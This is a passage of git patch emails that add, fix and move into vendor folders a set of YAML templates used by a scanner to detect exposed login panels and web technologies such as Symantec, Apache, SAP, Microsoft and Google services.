author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + tags: symantec,panel,login + +requests: + - method: GET + path: + - '{{BaseURL}}/ProtectManager/Logon' + + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Data Loss Prevention" + part: body + + - type: status + status: + - 200 From a6f9ff01dffb179827e5a98a793896ed0208f9ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:55:00 +0530 Subject: [PATCH 2180/4083] Create symantec-pgp-global-directory.yaml --- .../symantec-pgp-global-directory.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/symantec/symantec-pgp-global-directory.yaml diff --git a/exposed-panels/symantec/symantec-pgp-global-directory.yaml b/exposed-panels/symantec/symantec-pgp-global-directory.yaml new file mode 100644 index 0000000000..15f11d8c65 --- /dev/null +++ b/exposed-panels/symantec/symantec-pgp-global-directory.yaml @@ -0,0 +1,24 @@ +id: symantec-pgp-global-directory + +info: + name: Symantec PGP Global Directory + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22PGP+Global+Directory%22 + tags: symantec,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/vkd/GetWelcomeScreen.event' + + matchers-condition: and + matchers: + - type: word + words: + - "PGP Global Directory" + part: body + + - type: status + status: + - 200 From 85762d9986de8fca77a53ab4db517c771e7386c7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:55:21 +0530 Subject: [PATCH 2181/4083] Update symantec-dlp-login.yaml --- exposed-panels/symantec/symantec-dlp-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/symantec/symantec-dlp-login.yaml b/exposed-panels/symantec/symantec-dlp-login.yaml index 5034c5453c..b4e614e6e8 100644 --- a/exposed-panels/symantec/symantec-dlp-login.yaml +++ b/exposed-panels/symantec/symantec-dlp-login.yaml @@ -4,7 +4,7 @@ info: name: Symantec Data Loss Prevention author: princechaddha severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Data+Loss+Prevention%22 tags: symantec,panel,login requests: From 3a88fbd0c96f9fd8cfc16f02613a902f69e80e7b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:56:10 +0530 Subject: [PATCH 2182/4083] Update symantec-ewep-login.yaml --- exposed-panels/symantec/symantec-ewep-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/symantec/symantec-ewep-login.yaml b/exposed-panels/symantec/symantec-ewep-login.yaml index 954f4b1e22..bf1d69c06b 100644 --- a/exposed-panels/symantec/symantec-ewep-login.yaml +++ b/exposed-panels/symantec/symantec-ewep-login.yaml @@ -4,6 +4,7 @@ info: name: Symantec Encryption Web Email Protection author: johnk3r severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 tags: panel,symantec,login requests: From fa4f2ee50db8f011a9dc6514279a1d0c70ab60f2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:04:32 +0530 Subject: [PATCH 2183/4083] Update and rename technologies/adobe-coldfusion-detector-error.yaml to technologies/adobe/adobe-coldfusion-detect.yaml --- .../adobe-coldfusion-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{adobe-coldfusion-detector-error.yaml => adobe/adobe-coldfusion-detect.yaml} (93%) diff --git a/technologies/adobe-coldfusion-detector-error.yaml b/technologies/adobe/adobe-coldfusion-detect.yaml similarity index 93% rename from technologies/adobe-coldfusion-detector-error.yaml rename to technologies/adobe/adobe-coldfusion-detect.yaml index ef5d2b03b2..890cc265ce 100644 --- a/technologies/adobe-coldfusion-detector-error.yaml +++ b/technologies/adobe/adobe-coldfusion-detect.yaml @@ -1,4 +1,4 @@ -id: adobe-coldfusion-detector-error +id: adobe-coldfusion-detect info: name: Adobe ColdFusion Detector From 801a048b9ca7b4813d8879cc38519bc3c1e3e67d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:05:35 +0530 Subject: [PATCH 2184/4083] Update and rename adobe-coldfusion-detect.yaml to adobe-coldfusion-error-detect.yaml --- ...oldfusion-detect.yaml => adobe-coldfusion-error-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/adobe/{adobe-coldfusion-detect.yaml => adobe-coldfusion-error-detect.yaml} (94%) diff --git a/technologies/adobe/adobe-coldfusion-detect.yaml b/technologies/adobe/adobe-coldfusion-error-detect.yaml similarity index 94% rename from technologies/adobe/adobe-coldfusion-detect.yaml rename to technologies/adobe/adobe-coldfusion-error-detect.yaml index 890cc265ce..c6e8e0d1ea 100644 --- a/technologies/adobe/adobe-coldfusion-detect.yaml +++ b/technologies/adobe/adobe-coldfusion-error-detect.yaml @@ -1,4 +1,4 @@ -id: adobe-coldfusion-detect +id: adobe-coldfusion-error-detect info: name: Adobe ColdFusion Detector From c84dee1ce1643c8b67da17e4e2d7e8f66e5f8942 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:06:01 +0530 Subject: [PATCH 2185/4083] Update and rename adobe-coldfusion-detector.yaml to adobe-coldfusion-detect.yaml --- ...-coldfusion-detector.yaml => adobe-coldfusion-detect.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename technologies/{adobe-coldfusion-detector.yaml => adobe-coldfusion-detect.yaml} (97%) diff --git a/technologies/adobe-coldfusion-detector.yaml b/technologies/adobe-coldfusion-detect.yaml similarity index 97% rename from technologies/adobe-coldfusion-detector.yaml rename to technologies/adobe-coldfusion-detect.yaml index 9dee636d31..0d9330c87c 100644 --- a/technologies/adobe-coldfusion-detector.yaml +++ b/technologies/adobe-coldfusion-detect.yaml @@ -1,4 +1,4 @@ -id: adobe-coldfusion-detector +id: adobe-coldfusion-detect info: name: Adobe ColdFusion Detector @@ -59,4 +59,4 @@ requests: - type: dsl name: "coldfusion-mx-7" dsl: - - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" \ No newline at end of file + - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" From b865f30ac856d5cd73adeca1cc0a15835b40b2e9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:06:48 +0530 Subject: [PATCH 2186/4083] Rename technologies/apache-axis-detect.yaml to technologies/apache/apache-axis-detect.yaml --- technologies/{ => apache}/apache-axis-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/apache-axis-detect.yaml (100%) diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache/apache-axis-detect.yaml similarity index 100% rename from technologies/apache-axis-detect.yaml rename to technologies/apache/apache-axis-detect.yaml From 2fef2e3cec34c6ded30d49c4b6b136310ec0e0e1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:16 +0530 Subject: [PATCH 2187/4083] Rename technologies/apache-detect.yaml to technologies/apache/apache-detect.yaml --- technologies/{ => apache}/apache-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => apache}/apache-detect.yaml (96%) diff --git a/technologies/apache-detect.yaml b/technologies/apache/apache-detect.yaml similarity index 96% rename from technologies/apache-detect.yaml rename to technologies/apache/apache-detect.yaml index 4db33ceb08..eeb8966be3 100644 --- a/technologies/apache-detect.yaml +++ b/technologies/apache/apache-detect.yaml @@ -27,4 +27,4 @@ requests: - type: kval part: header kval: - - Server \ No newline at end of file + - Server From 364a825318fa52d346ce6a2d2bef2af27f257ccd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:25 +0530 Subject: [PATCH 2188/4083] Rename technologies/apache-guacamole.yaml to technologies/apache/apache-guacamole.yaml --- technologies/{ => apache}/apache-guacamole.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/apache-guacamole.yaml (100%) diff --git a/technologies/apache-guacamole.yaml b/technologies/apache/apache-guacamole.yaml similarity index 100% rename from technologies/apache-guacamole.yaml rename to technologies/apache/apache-guacamole.yaml From a2cb1b2882fd5d143673d36b6c4b56191e1b2d8c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:35 +0530 Subject: [PATCH 2189/4083] Rename technologies/default-apache-test-page.yaml to technologies/apache/default-apache-test-page.yaml --- technologies/{ => apache}/default-apache-test-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-apache-test-page.yaml (100%) diff --git a/technologies/default-apache-test-page.yaml b/technologies/apache/default-apache-test-page.yaml similarity index 100% rename from technologies/default-apache-test-page.yaml rename to technologies/apache/default-apache-test-page.yaml From dc95ae40fa64e549d46d678709354051fe7467fd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:43 +0530 Subject: [PATCH 2190/4083] Rename technologies/default-apache2-page.yaml to technologies/apache/default-apache2-page.yaml --- technologies/{ => apache}/default-apache2-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-apache2-page.yaml (100%) diff --git a/technologies/default-apache2-page.yaml b/technologies/apache/default-apache2-page.yaml similarity index 100% rename from technologies/default-apache2-page.yaml rename to technologies/apache/default-apache2-page.yaml From c561f96d27be85790f7e46ceea9b0e5f2b161a70 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:07:50 +0530 Subject: [PATCH 2191/4083] Rename technologies/default-apache2-ubuntu-page.yaml to technologies/apache/default-apache2-ubuntu-page.yaml --- technologies/{ => apache}/default-apache2-ubuntu-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-apache2-ubuntu-page.yaml (100%) diff --git a/technologies/default-apache2-ubuntu-page.yaml b/technologies/apache/default-apache2-ubuntu-page.yaml similarity index 100% rename from technologies/default-apache2-ubuntu-page.yaml rename to technologies/apache/default-apache2-ubuntu-page.yaml From a0ff68f00555fbb2ae03ae3168c422e22a7032c3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:08:32 +0530 Subject: [PATCH 2192/4083] Rename technologies/sap-igs-detect.yaml to technologies/sap/sap-igs-detect.yaml --- technologies/{ => sap}/sap-igs-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => sap}/sap-igs-detect.yaml (100%) diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap/sap-igs-detect.yaml similarity index 100% rename from technologies/sap-igs-detect.yaml rename to technologies/sap/sap-igs-detect.yaml From b32c7eb44d9e4f3f05017634a1f8e5b03f2629dc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:08:50 +0530 Subject: [PATCH 2193/4083] Rename technologies/sap-netweaver-detect.yaml to technologies/sap/sap-netweaver-detect.yaml --- technologies/{ => sap}/sap-netweaver-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => sap}/sap-netweaver-detect.yaml (100%) diff --git a/technologies/sap-netweaver-detect.yaml b/technologies/sap/sap-netweaver-detect.yaml similarity index 100% rename from technologies/sap-netweaver-detect.yaml rename to technologies/sap/sap-netweaver-detect.yaml From cd29d6bcecefb12cb31290ea220e02d5371eca96 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:08:56 +0530 Subject: [PATCH 2194/4083] Rename technologies/sap-netweaver-webgui.yaml to technologies/sap/sap-netweaver-webgui.yaml --- technologies/{ => sap}/sap-netweaver-webgui.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => sap}/sap-netweaver-webgui.yaml (95%) diff --git a/technologies/sap-netweaver-webgui.yaml b/technologies/sap/sap-netweaver-webgui.yaml similarity index 95% rename from technologies/sap-netweaver-webgui.yaml rename to technologies/sap/sap-netweaver-webgui.yaml index ca76355018..6562effe35 100644 --- a/technologies/sap-netweaver-webgui.yaml +++ b/technologies/sap/sap-netweaver-webgui.yaml @@ -20,4 +20,4 @@ requests: words: - "sap-system-login" - "Logon" - condition: or \ No newline at end of file + condition: or From 3594025e4d785c241ac207bda8971a2c2e46411a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:03 +0530 Subject: [PATCH 2195/4083] Rename technologies/sap-web-dispatcher-admin-portal.yaml to technologies/sap/sap-web-dispatcher-admin-portal.yaml --- technologies/{ => sap}/sap-web-dispatcher-admin-portal.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => sap}/sap-web-dispatcher-admin-portal.yaml (94%) diff --git a/technologies/sap-web-dispatcher-admin-portal.yaml b/technologies/sap/sap-web-dispatcher-admin-portal.yaml similarity index 94% rename from technologies/sap-web-dispatcher-admin-portal.yaml rename to technologies/sap/sap-web-dispatcher-admin-portal.yaml index f6f7c62464..1d5183b56a 100644 --- a/technologies/sap-web-dispatcher-admin-portal.yaml +++ b/technologies/sap/sap-web-dispatcher-admin-portal.yaml @@ -35,4 +35,4 @@ requests: condition: or words: - "SAP Web Dispatcher" - - "Administration" \ No newline at end of file + - "Administration" From ce8a9c5098a120e3a331d4922c8f1f0637aa38f9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:09 +0530 Subject: [PATCH 2196/4083] Rename technologies/sap-web-dispatcher.yaml to technologies/sap/sap-web-dispatcher.yaml --- technologies/{ => sap}/sap-web-dispatcher.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => sap}/sap-web-dispatcher.yaml (100%) diff --git a/technologies/sap-web-dispatcher.yaml b/technologies/sap/sap-web-dispatcher.yaml similarity index 100% rename from technologies/sap-web-dispatcher.yaml rename to technologies/sap/sap-web-dispatcher.yaml From 3991fac5e3390ee055110b01d062ec528fdb2fa0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:30 +0530 Subject: [PATCH 2197/4083] Rename technologies/adobe-coldfusion-detect.yaml to technologies/adobe/adobe-coldfusion-detect.yaml --- technologies/{ => adobe}/adobe-coldfusion-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => adobe}/adobe-coldfusion-detect.yaml (100%) diff --git a/technologies/adobe-coldfusion-detect.yaml b/technologies/adobe/adobe-coldfusion-detect.yaml similarity index 100% rename from technologies/adobe-coldfusion-detect.yaml rename to technologies/adobe/adobe-coldfusion-detect.yaml From 16db1dc76ae2f89a52b2d81c17d309bc8f58453f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:09:47 +0530 Subject: [PATCH 2198/4083] Rename technologies/airflow-detect.yaml to technologies/apache/airflow-detect.yaml --- technologies/{ => apache}/airflow-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => apache}/airflow-detect.yaml (95%) diff --git a/technologies/airflow-detect.yaml b/technologies/apache/airflow-detect.yaml similarity index 95% rename from technologies/airflow-detect.yaml rename to technologies/apache/airflow-detect.yaml index f2d6d97aa2..5306691e5b 100644 --- a/technologies/airflow-detect.yaml +++ b/technologies/apache/airflow-detect.yaml @@ -21,4 +21,4 @@ requests: - type: status status: - - 404 \ No newline at end of file + - 404 From aca84e760f971a87ac6f82d85c5f5361df49b6d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:11:52 +0530 Subject: [PATCH 2199/4083] Rename technologies/default-iis7-page.yaml to technologies/microsoft/default-iis7-page.yaml --- technologies/{ => microsoft}/default-iis7-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/default-iis7-page.yaml (100%) diff --git a/technologies/default-iis7-page.yaml b/technologies/microsoft/default-iis7-page.yaml similarity index 100% rename from technologies/default-iis7-page.yaml rename to technologies/microsoft/default-iis7-page.yaml From 09b8c69166d823240a5733b9893d05b98efdb32c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:11:59 +0530 Subject: [PATCH 2200/4083] Rename technologies/default-microsoft-azure-page.yaml to technologies/microsoft/default-microsoft-azure-page.yaml --- technologies/{ => microsoft}/default-microsoft-azure-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/default-microsoft-azure-page.yaml (100%) diff --git a/technologies/default-microsoft-azure-page.yaml b/technologies/microsoft/default-microsoft-azure-page.yaml similarity index 100% rename from technologies/default-microsoft-azure-page.yaml rename to technologies/microsoft/default-microsoft-azure-page.yaml From 670f3b67c0bd091d3a04e0d54453511356325a3a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:12:16 +0530 Subject: [PATCH 2201/4083] Rename technologies/default-windows-server-page.yaml to technologies/microsoft/default-windows-server-page.yaml --- technologies/{ => microsoft}/default-windows-server-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/default-windows-server-page.yaml (100%) diff --git a/technologies/default-windows-server-page.yaml b/technologies/microsoft/default-windows-server-page.yaml similarity index 100% rename from technologies/default-windows-server-page.yaml rename to technologies/microsoft/default-windows-server-page.yaml From 8a90299591b0540b134c4ff2d02b6847ff3d7716 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:12:30 +0530 Subject: [PATCH 2202/4083] Rename technologies/microsoft-exchange-server-detect.yaml to technologies/microsoft/microsoft-exchange-server-detect.yaml --- .../{ => microsoft}/microsoft-exchange-server-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/microsoft-exchange-server-detect.yaml (100%) diff --git a/technologies/microsoft-exchange-server-detect.yaml b/technologies/microsoft/microsoft-exchange-server-detect.yaml similarity index 100% rename from technologies/microsoft-exchange-server-detect.yaml rename to technologies/microsoft/microsoft-exchange-server-detect.yaml From 761dff10b2021cb71c4d9f928bca301eff69eb2c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:13:07 +0530 Subject: [PATCH 2203/4083] Rename technologies/nginx-linux-page.yaml to technologies/nginx/nginx-linux-page.yaml --- technologies/{ => nginx}/nginx-linux-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => nginx}/nginx-linux-page.yaml (100%) diff --git a/technologies/nginx-linux-page.yaml b/technologies/nginx/nginx-linux-page.yaml similarity index 100% rename from technologies/nginx-linux-page.yaml rename to technologies/nginx/nginx-linux-page.yaml From 276ae59db8de482790d29f0ef427f4262bf8709d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:13:13 +0530 Subject: [PATCH 2204/4083] Rename technologies/nginx-version.yaml to technologies/nginx/nginx-version.yaml --- technologies/{ => nginx}/nginx-version.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => nginx}/nginx-version.yaml (100%) diff --git a/technologies/nginx-version.yaml b/technologies/nginx/nginx-version.yaml similarity index 100% rename from technologies/nginx-version.yaml rename to technologies/nginx/nginx-version.yaml From 76c6650c233c5e69df23a400fcecaf573072286f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:13:19 +0530 Subject: [PATCH 2205/4083] Rename technologies/default-nginx-page.yaml to technologies/nginx/default-nginx-page.yaml --- technologies/{ => nginx}/default-nginx-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => nginx}/default-nginx-page.yaml (100%) diff --git a/technologies/default-nginx-page.yaml b/technologies/nginx/default-nginx-page.yaml similarity index 100% rename from technologies/default-nginx-page.yaml rename to technologies/nginx/default-nginx-page.yaml From 514281db511b73c433f7bbf5674337aaed4b38b9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:14:11 +0530 Subject: [PATCH 2206/4083] Rename technologies/oracle-http-server-12c.yaml to technologies/oracle/oracle-http-server-12c.yaml --- technologies/{ => oracle}/oracle-http-server-12c.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => oracle}/oracle-http-server-12c.yaml (100%) diff --git a/technologies/oracle-http-server-12c.yaml b/technologies/oracle/oracle-http-server-12c.yaml similarity index 100% rename from technologies/oracle-http-server-12c.yaml rename to technologies/oracle/oracle-http-server-12c.yaml From 7e10e338d863004c6c9e173f461e68562e8250f3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:14:19 +0530 Subject: [PATCH 2207/4083] Rename technologies/oracle-iplanet-web-server.yaml to technologies/oracle/oracle-iplanet-web-server.yaml --- technologies/{ => oracle}/oracle-iplanet-web-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => oracle}/oracle-iplanet-web-server.yaml (91%) diff --git a/technologies/oracle-iplanet-web-server.yaml b/technologies/oracle/oracle-iplanet-web-server.yaml similarity index 91% rename from technologies/oracle-iplanet-web-server.yaml rename to technologies/oracle/oracle-iplanet-web-server.yaml index 12d06c6232..6d080503e1 100644 --- a/technologies/oracle-iplanet-web-server.yaml +++ b/technologies/oracle/oracle-iplanet-web-server.yaml @@ -22,4 +22,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 6c4d6a5abbd5e0561b1b20dc67ef90184a7397f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:14:25 +0530 Subject: [PATCH 2208/4083] Rename technologies/default-oracle-application-page.yaml to technologies/oracle/default-oracle-application-page.yaml --- technologies/{ => oracle}/default-oracle-application-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => oracle}/default-oracle-application-page.yaml (100%) diff --git a/technologies/default-oracle-application-page.yaml b/technologies/oracle/default-oracle-application-page.yaml similarity index 100% rename from technologies/default-oracle-application-page.yaml rename to technologies/oracle/default-oracle-application-page.yaml From c03dcd01784ae788b340f0a1d7f873ca8241adf0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:15:01 +0530 Subject: [PATCH 2209/4083] Rename technologies/default-tomcat-page.yaml to technologies/apache/default-tomcat-page.yaml --- technologies/{ => apache}/default-tomcat-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-tomcat-page.yaml (100%) diff --git a/technologies/default-tomcat-page.yaml b/technologies/apache/default-tomcat-page.yaml similarity index 100% rename from technologies/default-tomcat-page.yaml rename to technologies/apache/default-tomcat-page.yaml From 487e5e421645c17c5706ff93f8ce2de5073a501b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:15:10 +0530 Subject: [PATCH 2210/4083] Rename technologies/tomcat-detect.yaml to technologies/apache/tomcat-detect.yaml --- technologies/{ => apache}/tomcat-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/tomcat-detect.yaml (100%) diff --git a/technologies/tomcat-detect.yaml b/technologies/apache/tomcat-detect.yaml similarity index 100% rename from technologies/tomcat-detect.yaml rename to technologies/apache/tomcat-detect.yaml From d0bd1bbcee3258dc7d9331e25cd214edfe2656ee Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:16:20 +0530 Subject: [PATCH 2211/4083] Rename technologies/kubernetes-version.yaml to technologies/kubernetes/kubernetes-version.yaml --- technologies/{ => kubernetes}/kubernetes-version.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => kubernetes}/kubernetes-version.yaml (100%) diff --git a/technologies/kubernetes-version.yaml b/technologies/kubernetes/kubernetes-version.yaml similarity index 100% rename from technologies/kubernetes-version.yaml rename to technologies/kubernetes/kubernetes-version.yaml From 1849797fea846f94379f2916b322ca288a3dd666 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:16:27 +0530 Subject: [PATCH 2212/4083] Rename technologies/kubernetes-mirantis.yaml to technologies/kubernetes/kubernetes-mirantis.yaml --- technologies/{ => kubernetes}/kubernetes-mirantis.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => kubernetes}/kubernetes-mirantis.yaml (91%) diff --git a/technologies/kubernetes-mirantis.yaml b/technologies/kubernetes/kubernetes-mirantis.yaml similarity index 91% rename from technologies/kubernetes-mirantis.yaml rename to technologies/kubernetes/kubernetes-mirantis.yaml index 34516924bc..f823c86fb8 100644 --- a/technologies/kubernetes-mirantis.yaml +++ b/technologies/kubernetes/kubernetes-mirantis.yaml @@ -22,4 +22,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 444e8af25a1ffb8466e0c1b1c5c5eef7685472a6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:16:33 +0530 Subject: [PATCH 2213/4083] Rename technologies/kubernetes-enterprise-manager.yaml to technologies/kubernetes/kubernetes-enterprise-manager.yaml --- .../{ => kubernetes}/kubernetes-enterprise-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => kubernetes}/kubernetes-enterprise-manager.yaml (91%) diff --git a/technologies/kubernetes-enterprise-manager.yaml b/technologies/kubernetes/kubernetes-enterprise-manager.yaml similarity index 91% rename from technologies/kubernetes-enterprise-manager.yaml rename to technologies/kubernetes/kubernetes-enterprise-manager.yaml index 3a22e2d120..137e4062a7 100644 --- a/technologies/kubernetes-enterprise-manager.yaml +++ b/technologies/kubernetes/kubernetes-enterprise-manager.yaml @@ -22,4 +22,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 5d6ac2f090372b5a4c448cb617b2b8a406a26027 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:17:32 +0530 Subject: [PATCH 2214/4083] Rename technologies/google-bucket-service.yaml to technologies/google/google-bucket-service.yaml --- technologies/{ => google}/google-bucket-service.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => google}/google-bucket-service.yaml (97%) diff --git a/technologies/google-bucket-service.yaml b/technologies/google/google-bucket-service.yaml similarity index 97% rename from technologies/google-bucket-service.yaml rename to technologies/google/google-bucket-service.yaml index f8fe51f476..581c71ab67 100644 --- a/technologies/google-bucket-service.yaml +++ b/technologies/google/google-bucket-service.yaml @@ -22,4 +22,4 @@ requests: - contains(tolower(all_headers), 'x-goog-stored-content-length') - contains(tolower(all_headers), 'x-guploader-uploadid') part: header - condition: or \ No newline at end of file + condition: or From f5c68c8dcd81922f3aedf4bf76ddb86d5591d35c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:17:39 +0530 Subject: [PATCH 2215/4083] Rename technologies/google-storage.yaml to technologies/google/google-storage.yaml --- technologies/{ => google}/google-storage.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => google}/google-storage.yaml (93%) diff --git a/technologies/google-storage.yaml b/technologies/google/google-storage.yaml similarity index 93% rename from technologies/google-storage.yaml rename to technologies/google/google-storage.yaml index 95963c6a8c..a36c7baded 100644 --- a/technologies/google-storage.yaml +++ b/technologies/google/google-storage.yaml @@ -15,4 +15,4 @@ requests: words: - x-goog-metageneration - X-Goog-Metageneration - part: header \ No newline at end of file + part: header From c82bced598f9158b50fd09e02fcf50a79012750e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:19:04 +0530 Subject: [PATCH 2216/4083] Rename technologies/sql-server-reporting.yaml to technologies/microsoft/sql-server-reporting.yaml --- technologies/{ => microsoft}/sql-server-reporting.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/sql-server-reporting.yaml (100%) diff --git a/technologies/sql-server-reporting.yaml b/technologies/microsoft/sql-server-reporting.yaml similarity index 100% rename from technologies/sql-server-reporting.yaml rename to technologies/microsoft/sql-server-reporting.yaml From 53cf6811f46a0937a9bca466da1c81ca759c0dfc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:21:42 +0530 Subject: [PATCH 2217/4083] Rename technologies/firebase-detect.yaml to technologies/google/firebase-detect.yaml --- technologies/{ => google}/firebase-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => google}/firebase-detect.yaml (100%) diff --git a/technologies/firebase-detect.yaml b/technologies/google/firebase-detect.yaml similarity index 100% rename from technologies/firebase-detect.yaml rename to technologies/google/firebase-detect.yaml From d75199919af504802d0e20edae954f5be8cc9c37 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:21:49 +0530 Subject: [PATCH 2218/4083] Rename technologies/firebase-urls.yaml to technologies/google/firebase-urls.yaml --- technologies/{ => google}/firebase-urls.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => google}/firebase-urls.yaml (96%) diff --git a/technologies/firebase-urls.yaml b/technologies/google/firebase-urls.yaml similarity index 96% rename from technologies/firebase-urls.yaml rename to technologies/google/firebase-urls.yaml index 67a05cefcb..18f0ab9edd 100644 --- a/technologies/firebase-urls.yaml +++ b/technologies/google/firebase-urls.yaml @@ -20,4 